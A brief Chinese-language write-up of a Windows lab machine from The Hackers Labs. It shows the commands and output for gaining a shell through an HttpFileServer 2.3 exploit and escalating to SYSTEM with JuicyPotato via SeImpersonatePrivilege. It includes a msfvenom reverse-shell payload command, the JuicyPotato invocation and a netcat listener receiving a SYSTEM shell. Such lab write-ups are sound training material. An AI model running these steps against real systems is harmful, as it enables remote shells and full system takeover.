靶场:The Hackers Labs
地址:https://thehackerslabs.com/espeto-malaqueno/
系统:windows
内容:SeImpersonatePrivilege提权
这个机器流程比较简单,这里简单记录下。
第一步,80端口运行了httpfileserver 2.3,查找漏洞利用工具,直接得到用户shell。
第二步,查看用户权限,具有SeImpersonatePrivilege。
PS C:\Users\hacker\Downloads> whoami /priv
INFORMACI?N DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci?n Estado
============================= ============================================ =============
SeChangeNotifyPrivilege Omitir comprobaci?n de recorrido Habilitada
SeImpersonatePrivilege Suplantar a un cliente tras la autenticaci?n Habilitada
SeCreateGlobalPrivilege Crear objetos globales Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado
利用JuciyPotato提权,网址https://github.com/ohpe/juicy-potato。
首先生成shell。
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 -f exe > rev.exe
将JuciyPotato.exe和rev.exe都上传至靶机,提权命令为:
PS C:\Users\hacker\Downloads> .\JuicyPotato.exe -l 1337 -p rev.exe -t * -c "{f3b4e234-7a68-4e43-b813-e4ba55a065f6}"
Testing {f3b4e234-7a68-4e43-b813-e4ba55a065f6} 1337
....
[+] authresult 0
{f3b4e234-7a68-4e43-b813-e4ba55a065f6};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
监听的端口得到root shell。
└─$ rlwrap nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.157] 49166
Microsoft Windows [Versin 6.3.9600]
(c) 2013 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>